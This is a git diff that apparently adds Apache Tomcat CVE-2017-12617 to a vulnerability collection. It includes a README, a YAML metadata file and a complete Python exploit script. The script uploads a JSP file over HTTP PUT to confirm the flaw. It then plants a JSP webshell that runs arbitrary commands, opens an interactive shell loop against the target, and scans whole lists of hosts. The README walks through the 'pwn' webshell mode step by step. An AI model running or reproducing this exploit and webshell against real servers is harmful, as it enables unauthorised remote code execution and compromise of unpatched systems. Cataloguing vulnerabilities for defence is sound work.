diff --git a/cve/apache-tomcat/2017/CVE-2017-12617/README.md b/cve/apache-tomcat/2017/CVE-2017-12617/README.md new file mode 100644 index 0000000000000000000000000000000000000000..8eb453be0abff27766296b0b86d5793a13134585 --- /dev/null +++ b/cve/apache-tomcat/2017/CVE-2017-12617/README.md @@ -0,0 +1,57 @@ +# CVE-2017-12617 +CVE-2017-12617 critical Remote Code Execution (RCE) vulnerability discovered in Apache Tomcat + + +

affect systems with HTTP PUTs enabled (via setting the "read-only" initialization parameter of the Default servlet to "false") are affected. + +

Tomcat versions before 9.0.1 (Beta), 8.5.23, 8.0.47 and 7.0.82 contain a potentially dangerous +

remote code execution (RCE) vulnerability on all operating systems if the default servlet is +

configured with the parameter readonly set to false or the WebDAV servlet is enabled with the +

parameter readonly set to false + +# Apache Tomcat page + + +
./cve-2017-12617.py [options] + +
options: + +
-u ,--url [::] check target url if it's vulnerable +
-p,--pwn [::] generate webshell and upload it +
-l,--list [::] hosts list + +
[+]usage: + +
./cve-2017-12617.py -u http://127.0.0.1 +
./cve-2017-12617.py --url http://127.0.0.1 +
./cve-2017-12617.py -u http://127.0.0.1 -p pwn +
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn +
./cve-2017-12617.py -l hotsts.txt +
./cve-2017-12617.py --list hosts.txt + + +

Banner
+![alt text](https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/screenshots/banner.PNG) + +![alt text](https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/screenshots/1.PNG) +

Check target if it's vulneabel
+![alt text](https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/screenshots/44.PNG) +

Confirm file was created
+![alt text](https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/screenshots/2.PNG) +

Create Webshell and get shell +![alt text](https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/screenshots/3.PNG) +

Scan hosts in txt file
+![alt text](https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/screenshots/5.PNG) + + + + + + + + + +

[ @intx0x80 ] + + + diff --git a/cve/apache-tomcat/2017/CVE-2017-12617/tomcat-cve-2017-12617.py b/cve/apache-tomcat/2017/CVE-2017-12617/tomcat-cve-2017-12617.py new file mode 100644 index 0000000000000000000000000000000000000000..442fc27aab9c353d6f4634884637370535e212be --- /dev/null +++ b/cve/apache-tomcat/2017/CVE-2017-12617/tomcat-cve-2017-12617.py @@ -0,0 +1,224 @@ +#!/usr/bin/python +import requests +import re +import signal +from optparse import OptionParser + + + + + + +class bcolors: + HEADER = '\033[95m' + OKBLUE = '\033[94m' + OKGREEN = '\033[92m' + WARNING = '\033[93m' + FAIL = '\033[91m' + ENDC = '\033[0m' + BOLD = '\033[1m' + UNDERLINE = '\033[4m' + + + + +banner=""" + + + _______ ________ ___ ___ __ ______ __ ___ __ __ ______ + / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ | + | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / + | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / + | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / + \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ + + + +[@intx0x80] + +""" + + + + + +def signal_handler(signal, frame): + + print ("\033[91m"+"\n[-] Exiting"+"\033[0m") + + exit() + +signal.signal(signal.SIGINT, signal_handler) + + + + +def removetags(tags): + remove = re.compile('<.*?>') + txt = re.sub(remove, '\n', tags) + return txt.replace("\n\n\n","\n") + + +def getContent(url,f): + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + requests.packages.urllib3.disable_warnings() + re=requests.get(str(url)+"/"+str(f), headers=headers,verify=False) + return re.content + +def createPayload(url,f): + evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>' + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + requests.packages.urllib3.disable_warnings() + req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers,verify=False) + if req.status_code==201: + print "File Created .." + + +def RCE(url,f): + EVIL="""
""".format(f)+""" + + +
+ <%@ page import="java.io.*" %> + <% + String cmd = request.getParameter("cmd"); + String output = ""; + if(cmd != null) { + String s = null; + try { + Process p = Runtime.getRuntime().exec(cmd,null,null); + BufferedReader sI = new BufferedReader(new +InputStreamReader(p.getInputStream())); + while((s = sI.readLine()) != null) { output += s+"
"; } + } catch(IOException e) { e.printStackTrace(); } + } +%> +
<%=output %>
""" + + + + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + requests.packages.urllib3.disable_warnings() + req=requests.put(str(url)+f+"/",data=EVIL, headers=headers,verify=False) + + + +def shell(url,f): + + while True: + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + cmd=raw_input("$ ") + payload={'cmd':cmd} + if cmd=="q" or cmd=="Q": + break + requests.packages.urllib3.disable_warnings() + re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers,verify=False) + re=str(re.content) + t=removetags(re) + print t + + + + + +#print bcolors.HEADER+ banner+bcolors.ENDC + +parse=OptionParser( + + +bcolors.HEADER+""" + + + _______ ________ ___ ___ __ ______ __ ___ __ __ ______ + / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ | + | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / + | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / + | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / + \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ + + + + +./cve-2017-12617.py [options] + +options: + +-u ,--url [::] check target url if it's vulnerable +-p,--pwn [::] generate webshell and upload it +-l,--list [::] hosts list + +[+]usage: + +./cve-2017-12617.py -u http://127.0.0.1 +./cve-2017-12617.py --url http://127.0.0.1 +./cve-2017-12617.py -u http://127.0.0.1 -p pwn +./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn +./cve-2017-12617.py -l hotsts.txt +./cve-2017-12617.py --list hosts.txt + + +[@intx0x80] + +"""+bcolors.ENDC + + ) + + +parse.add_option("-u","--url",dest="U",type="string",help="Website Url") +parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it") +parse.add_option("-l","--list",dest="L",type="string",help="hosts File") + +(opt,args)=parse.parse_args() + +if opt.U==None and opt.P==None and opt.L==None: + print(parse.usage) + exit(0) + + + +else: + if opt.U!=None and opt.P==None and opt.L==None: + print bcolors.OKGREEN+banner+bcolors.ENDC + url=str(opt.U) + checker="Poc.jsp" + print bcolors.BOLD +"Poc Filename {}".format(checker) + createPayload(str(url)+"/",checker) + con=getContent(str(url)+"/",checker) + if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: + print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC + print bcolors.WARNING+url+"/"+checker+bcolors.ENDC + + else: + print 'Not Vulnerable to CVE-2017-12617 ' + elif opt.P!=None and opt.U!=None and opt.L==None: + print bcolors.OKGREEN+banner+bcolors.ENDC + pwn=str(opt.P) + url=str(opt.U) + print "Uploading Webshell ....." + pwn=pwn+".jsp" + RCE(str(url)+"/",pwn) + shell(str(url),pwn) + elif opt.L!=None and opt.P==None and opt.U==None: + print bcolors.OKGREEN+banner+bcolors.ENDC + w=str(opt.L) + f=open(w,"r") + print "Scaning hosts in {}".format(w) + checker="Poc.jsp" + for i in f.readlines(): + i=i.strip("\n") + createPayload(str(i)+"/",checker) + con=getContent(str(i)+"/",checker) + if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: + print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m" + + + + + + + + + + + + diff --git a/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml b/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml new file mode 100644 index 0000000000000000000000000000000000000000..28fd6b2b9b56c3ce94c550f6d016aa51048cf039 --- /dev/null +++ b/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml @@ -0,0 +1,19 @@ +id: CVE-2017-12617 +source: https://github.com/cyberheartmi9/CVE-2017-12617 +info: + name: Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 + description: + 如果默认servlet配置为参数readonly设置为false,或者WebDAV servlet启用为参数readonly设置为false时,所有操作系统上都存在emote代码执行(RCE)漏洞。 + scope-of-influence: + tomcat versions before 9.0.1 (Beta), 8.5.23, 8.0.47 and 7.0.82 + reference: + - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2017-12617 + - https://nvd.nist.gov/vuln/detail/cve-2017-12617 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2017-12617 + cwe-id: CWE-434 + cnvd-id: None + kve-id: None + tags: cve2017, Apache, Tomcat,RCE diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 211571f6447ebe793ef2ea64e87df544374ff211..f8c8e0771e3fcf5a97dc886787479a601e12b16e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -30,6 +30,7 @@ cve: - CVE-2022-29885 - CVE-2020-9484 - CVE-2020-1938 + - CVE-2017-12617 apache-Spark: - CVE-2022-33891 apache-Flink: